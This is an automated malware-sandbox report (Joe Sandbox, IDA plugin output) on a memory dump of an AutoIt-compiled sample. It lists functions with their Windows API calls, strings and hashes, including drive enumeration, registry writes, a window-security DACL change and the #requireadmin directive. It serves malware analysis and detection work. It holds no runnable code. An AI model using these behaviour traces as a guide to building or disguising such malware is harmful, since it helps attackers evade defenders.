Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: eb38ccc68c7b6ae5f41e82f5ae296159f6d2048d3c9ceea77f3f17d616aaf488
Instruction ID: 1dc37b50d90acb6d8ebebac012d5d8036505874fb22b3b62ca9828a44bb68870
Opcode Fuzzy Hash: eb38ccc68c7b6ae5f41e82f5ae296159f6d2048d3c9ceea77f3f17d616aaf488
Instruction Fuzzy Hash: 15B15D71A00209AFEB14DFA8CD89FAE7BB9EB44714F008114FA15EB291D774ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A64ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A64AED
GetDriveTypeW.KERNEL32(?,00A8CB68,?,\\.\,00A8CC08), ref: 00A64BCA
SetErrorMode.KERNEL32(00000000,00A8CB68,?,\\.\,00A8CC08), ref: 00A64D36

Strings

PhysicalDrive, xrefs: 00A64B76
CDROM, xrefs: 00A64BFB
\\.\, xrefs: 00A64B3F
SAS, xrefs: 00A64CC9
RAID, xrefs: 00A64CBB
Fibre, xrefs: 00A64CAD
Virtual, xrefs: 00A64CE5
iSCSI, xrefs: 00A64CC2
Unknown, xrefs: 00A64BED, 00A64C83
Fixed, xrefs: 00A64C09
SCSI, xrefs: 00A64C8A
SSD, xrefs: 00A64C4A
Network, xrefs: 00A64C02
SATA, xrefs: 00A64CD0
ATA, xrefs: 00A64C98
ATAPI, xrefs: 00A64C91
MMC, xrefs: 00A64CDE
1394, xrefs: 00A64C9F
USB, xrefs: 00A64CB4
SSA, xrefs: 00A64CA6
Removable, xrefs: 00A64C10, 00A64C15
FileBackedVirtual, xrefs: 00A64CEC
RAMDisk, xrefs: 00A64BF4

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: ef15d75a8ec1d851dfac8b68f2017c63ae95a7ba8c202b10c5dfb83f4883722c
Instruction ID: 6ba167bbb3d8ca93320065abce0c3858b9b8d25ef2c3cf431e28f4cdd81eff5a
Opcode Fuzzy Hash: ef15d75a8ec1d851dfac8b68f2017c63ae95a7ba8c202b10c5dfb83f4883722c
Instruction Fuzzy Hash: 4961D370701509EBCB44DF28CA81AB97BB4FF4D744B248815F806AB792DB3AED41DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00A873E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00A87421
SetTextColor.GDI32(?,?), ref: 00A87425
GetSysColorBrush.USER32 ref: 00A8743B
GetSysColor.USER32 ref: 00A87446
CreateSolidBrush.GDI32(?), ref: 00A8744B
GetSysColor.USER32 ref: 00A87463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A87471
SelectObject.GDI32(?,00000000), ref: 00A87482
SetBkColor.GDI32(?,00000000), ref: 00A8748B
SelectObject.GDI32(?,?), ref: 00A87498
InflateRect.USER32 ref: 00A874B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A874CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00A874DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A8752A
GetWindowTextW.USER32 ref: 00A87554
InflateRect.USER32 ref: 00A87572
DrawFocusRect.USER32 ref: 00A8757D
GetSysColor.USER32 ref: 00A8758E
SetTextColor.GDI32(?,00000000), ref: 00A87596
DrawTextW.USER32(?,00A870F5,000000FF,?,00000000), ref: 00A875A8
SelectObject.GDI32(?,?), ref: 00A875BF
DeleteObject.GDI32(?), ref: 00A875CA
SelectObject.GDI32(?,?), ref: 00A875D0
DeleteObject.GDI32(?), ref: 00A875D5
SetTextColor.GDI32(?,?), ref: 00A875DB
SetBkColor.GDI32(?,?), ref: 00A875E5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: be65adf25daf4568c8c4248d4acdb69feab1c75473b7eeb26340a78c533592c5
Instruction ID: 333fdd67f68a970f4671ca2602e909abf2c04c626e0f0f2ca94455fd9d7351be
Opcode Fuzzy Hash: be65adf25daf4568c8c4248d4acdb69feab1c75473b7eeb26340a78c533592c5
Instruction Fuzzy Hash: 95615D72900218AFDF15DFA4DC49EAE7FB9EB08330F214225F915AB2A1D7749941DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A80FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A81128
GetDesktopWindow.USER32 ref: 00A8113D
GetWindowRect.USER32(00000000), ref: 00A81144
GetWindowLongW.USER32(?,000000F0), ref: 00A81199
DestroyWindow.USER32 ref: 00A811B9
CreateWindowExW.USER32 ref: 00A811ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A8120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A8121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00A81232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A81245
IsWindowVisible.USER32(00000000), ref: 00A812A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A812BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A812D0
GetWindowRect.USER32(00000000,?), ref: 00A812E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00A8130E
GetMonitorInfoW.USER32(00000000,?), ref: 00A81328
CopyRect.USER32(?,?), ref: 00A8133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00A813AA

Strings

(, xrefs: 00A8131B
0, xrefs: 00A810D3
tooltips_class32, xrefs: 00A811E6

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: ca6c898074ffef7ec18f441adcae0ab1b22367646f355b2d562f8da5f1d6e16a
Instruction ID: d1625d60ace83f5f31ada91b85ed278ce337dca741b5d45abd428f49f4dcc316
Opcode Fuzzy Hash: ca6c898074ffef7ec18f441adcae0ab1b22367646f355b2d562f8da5f1d6e16a
Instruction Fuzzy Hash: 55B17E71604341AFD714EF64C884B6ABBE8FF84354F00891CF9999B261D771E846CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A80241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A802E5
_wcslen.LIBCMT ref: 00A8031F
_wcslen.LIBCMT ref: 00A80389
_wcslen.LIBCMT ref: 00A803F1
_wcslen.LIBCMT ref: 00A80475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A804C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A80504

Part of subcall function 00A0F9F2: _wcslen.LIBCMT ref: 00A0F9FD

Part of subcall function 00A5223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A52258
Part of subcall function 00A5223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A5228A

Strings

SELECTALL, xrefs: 00A80515
GETSELECTEDCOUNT, xrefs: 00A80470, 00A8048B
SELECT, xrefs: 00A80548
FINDITEM, xrefs: 00A80627
ISSELECTED, xrefs: 00A804DD
SELECTINVERT, xrefs: 00A8057E
SELECTCLEAR, xrefs: 00A8052D
VIEWCHANGE, xrefs: 00A80675
GETTEXT, xrefs: 00A803EC, 00A80407
DESELECT, xrefs: 00A8059C
GETSUBITEMCOUNT, xrefs: 00A80384, 00A8039F
GETITEMCOUNT, xrefs: 00A80316, 00A80337
GETSELECTED, xrefs: 00A805E1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: a2d342fe68f267f482c35657a93e4b91c63e9e3f16093b1629a6c249f9ad77b9
Instruction ID: a2695f3949a94091374ed1b9798d6b626b5dcc6e9ff381d2adbccefdbafd3a77
Opcode Fuzzy Hash: a2d342fe68f267f482c35657a93e4b91c63e9e3f16093b1629a6c249f9ad77b9
Instruction Fuzzy Hash: ACE1AB312082018FC764EF24C951D7EB7E6BFC9354B14896CF896AB2A2DB70ED49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A08891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00A08968
GetSystemMetrics.USER32 ref: 00A08970
SystemParametersInfoW.USER32 ref: 00A0899B
GetSystemMetrics.USER32 ref: 00A089A3
GetSystemMetrics.USER32 ref: 00A089C8
SetRect.USER32 ref: 00A089E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A089F5
CreateWindowExW.USER32 ref: 00A08A28
SetWindowLongW.USER32 ref: 00A08A3C
GetClientRect.USER32 ref: 00A08A5A
GetStockObject.GDI32(00000011), ref: 00A08A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A08A81

Part of subcall function 00A0912D: GetCursorPos.USER32(?), ref: 00A09141
Part of subcall function 00A0912D: ScreenToClient.USER32(00000000,?), ref: 00A0915E
Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A09183
Part of subcall function 00A0912D: GetAsyncKeyState.USER32 ref: 00A0919D

SetTimer.USER32(00000000,00000000,00000028,00A090FC), ref: 00A08AA8

Strings

AutoIt v3 GUI, xrefs: 00A08A20

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e926a64d66ab865b9b2483b19177755ca666482d91bfaffcb69642fbdc554e69
Instruction ID: d8ec3135a82c124ac957d2c0e61471f28ee3193a4428b9843059456fbec42142
Opcode Fuzzy Hash: e926a64d66ab865b9b2483b19177755ca666482d91bfaffcb69642fbdc554e69
Instruction Fuzzy Hash: C1B16A75A002099FDF14DFA8DC45BAA3BB5BB49324F114229FA15A72D0DB34E841CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A50D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A51114
Part of subcall function 00A510F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51120
Part of subcall function 00A510F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A5112F
Part of subcall function 00A510F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A50B9B,?,?,?), ref: 00A51136
Part of subcall function 00A510F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A5114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A50DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A50E29
GetLengthSid.ADVAPI32(?), ref: 00A50E40
GetAce.ADVAPI32(?,00000000,?), ref: 00A50E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A50E96
GetLengthSid.ADVAPI32(?), ref: 00A50EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A50EB5
HeapAlloc.KERNEL32(00000000), ref: 00A50EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A50EDD
CopySid.ADVAPI32(00000000), ref: 00A50EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A50F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A50F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A50F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50F6E
HeapFree.KERNEL32(00000000), ref: 00A50F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50F7E
HeapFree.KERNEL32(00000000), ref: 00A50F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A50F8E
HeapFree.KERNEL32(00000000), ref: 00A50F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00A50FA1
HeapFree.KERNEL32(00000000), ref: 00A50FA8

Part of subcall function 00A51193: GetProcessHeap.KERNEL32(00000008,00A50BB1,?,00000000,?,00A50BB1,?), ref: 00A511A1
Part of subcall function 00A51193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A50BB1,?), ref: 00A511A8
Part of subcall function 00A51193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A50BB1,?), ref: 00A511B7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: a0d7603b2fa19f2f6e852888267371334d42463c607be7493c64eb0b8438e5a3
Instruction ID: 0fa8e594cc503b02b728a2449032dca3d8d2499f7f1b7a749c6976828ba638bd
Opcode Fuzzy Hash: a0d7603b2fa19f2f6e852888267371334d42463c607be7493c64eb0b8438e5a3
Instruction Fuzzy Hash: 9071597290021AABDF20DFA4DD49FAEBBB8BF04752F144215F919E6191D7319A0ACF70

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A8CC08,00000000,?,00000000,?,?), ref: 00A7C544
RegCloseKey.ADVAPI32(00000000), ref: 00A7C5A4
_wcslen.LIBCMT ref: 00A7C5F4
_wcslen.LIBCMT ref: 00A7C66F
RegSetValueExW.ADVAPI32 ref: 00A7C6B2
RegSetValueExW.ADVAPI32 ref: 00A7C7C1
RegSetValueExW.ADVAPI32 ref: 00A7C84D
RegCloseKey.ADVAPI32(?), ref: 00A7C881
RegCloseKey.ADVAPI32(00000000), ref: 00A7C88E
RegSetValueExW.ADVAPI32 ref: 00A7C960

Strings

REG_BINARY, xrefs: 00A7C913
REG_SZ, xrefs: 00A7C644
REG_QWORD, xrefs: 00A7C8C3
REG_MULTI_SZ, xrefs: 00A7C6F5
REG_EXPAND_SZ, xrefs: 00A7C5CD
REG_DWORD, xrefs: 00A7C804

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: de46082ca99dde90563614b700edcde67a8b87e34584c5eb5ae8191571e5e73b
Instruction ID: 1844e8b78c6b0ece6c14be5c52ccb09250ea6fda4b7b2f58da1f1ca2430998e3
Opcode Fuzzy Hash: de46082ca99dde90563614b700edcde67a8b87e34584c5eb5ae8191571e5e73b
Instruction Fuzzy Hash: CF125675604205AFD714DF24C881B2AB7E5EF88724F04C89DF98A9B3A2DB71ED45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A8091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A809C6
_wcslen.LIBCMT ref: 00A80A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A80A54
_wcslen.LIBCMT ref: 00A80A8A
_wcslen.LIBCMT ref: 00A80B06
_wcslen.LIBCMT ref: 00A80B81

Part of subcall function 00A0F9F2: _wcslen.LIBCMT ref: 00A0F9FD

Part of subcall function 00A52BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A52BFA

Strings

GETTOTALCOUNT, xrefs: 00A809F2, 00A80A17
SELECT, xrefs: 00A80D11
UNCHECK, xrefs: 00A80D3E
CHECK, xrefs: 00A80A85, 00A80AA0
GETITEMCOUNT, xrefs: 00A80C1E
ISCHECKED, xrefs: 00A80CE1
GETSELECTED, xrefs: 00A80C4E
COLLAPSE, xrefs: 00A80B01, 00A80B1C
GETTEXT, xrefs: 00A80C97
EXISTS, xrefs: 00A80B7C, 00A80B97
EXPAND, xrefs: 00A80BF8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: ada0f44ffd58f632361cffa25b07d9975befe0112c2c2320945a879204c5d9ee
Instruction ID: 8c540bbf0da261f4c6ee2bda43b44bbb09cdee46915f18f84719cfe90bde54c8
Opcode Fuzzy Hash: ada0f44ffd58f632361cffa25b07d9975befe0112c2c2320945a879204c5d9ee
Instruction Fuzzy Hash: 08E189312083019FCB54EF24C550E6AB7E1BF98354B15895DF89AAB3A2DB31ED49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00A7C9B5
_wcslen.LIBCMT ref: 00A7C9F1
_wcslen.LIBCMT ref: 00A7CA68
_wcslen.LIBCMT ref: 00A7CA9E
_wcslen.LIBCMT ref: 00A7CAF9
_wcslen.LIBCMT ref: 00A7CB2F
_wcslen.LIBCMT ref: 00A7CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 00A7CA62, 00A7CA67
HKEY_CLASSES_ROOT, xrefs: 00A7CAF3, 00A7CAF8
HKCC, xrefs: 00A7CBAC
HKCR, xrefs: 00A7CB29, 00A7CB2E
HKU, xrefs: 00A7CBF0
HKLM, xrefs: 00A7CA98, 00A7CA9D
HKCU, xrefs: 00A7CBCE
HKEY_CURRENT_USER, xrefs: 00A7CBBD
HKEY_CURRENT_CONFIG, xrefs: 00A7CB79, 00A7CB7E
HKEY_USERS, xrefs: 00A7CBDF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: b18c3fe1b54462086c45e6598ce257f1fc9e73af3e66bf558489b2a6dc46e73f
Instruction ID: cc9dabeb777de149182942d49d05656410b0810c2ef072c991195b8f9cb3af89
Opcode Fuzzy Hash: b18c3fe1b54462086c45e6598ce257f1fc9e73af3e66bf558489b2a6dc46e73f
Instruction Fuzzy Hash: 9B71E73260012A8BCB20DF7CCD515FF33A6ABA47B4B15C52CF85DA7285EA71CD858390

Uniqueness

Uniqueness Score: -1.00%

Function 00A8833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A8835A
_wcslen.LIBCMT ref: 00A8836E
_wcslen.LIBCMT ref: 00A88391
_wcslen.LIBCMT ref: 00A883B4
LoadImageW.USER32 ref: 00A883F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A85BF2), ref: 00A8844E
LoadImageW.USER32 ref: 00A88487
LoadImageW.USER32 ref: 00A884CA
LoadImageW.USER32 ref: 00A88501
FreeLibrary.KERNEL32(?), ref: 00A8850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A8851D
DestroyIcon.USER32(?,?,?,?,?,00A85BF2), ref: 00A8852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A88549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A88555

Strings

.dll, xrefs: 00A883AB
.icl, xrefs: 00A88368
.exe, xrefs: 00A88388

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 99ae54a337d4f210c246e20a28619b36ca97f3148999fa4470edc801dc94222c
Instruction ID: 44f402320ab4d750dd14d3b4440801949da180f36fd0b7e81839396ed425e309
Opcode Fuzzy Hash: 99ae54a337d4f210c246e20a28619b36ca97f3148999fa4470edc801dc94222c
Instruction Fuzzy Hash: 8F61C072540219BAEB14EF64CC45BFE77ACBF08B21F504609F915D60D1DF78A980CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009F7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#OnAutoItStartRegister, xrefs: 009F7817
#cs, xrefs: 009F7873, 009F78C5
", xrefs: 00A35153
#comments-start, xrefs: 009F785F, 009F78B1
Cannot parse #include, xrefs: 00A35279
', xrefs: 00A35169
#ce, xrefs: 009F78ED
#include-once, xrefs: 009F782F
Bad directive syntax error, xrefs: 00A3519A
#pragma compile, xrefs: 009F77D3
#requireadmin, xrefs: 009F77FF
#notrayicon, xrefs: 009F77E7
#comments-end, xrefs: 009F78D9
Unterminated group of comments, xrefs: 00A3528C
#include, xrefs: 009F7847

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
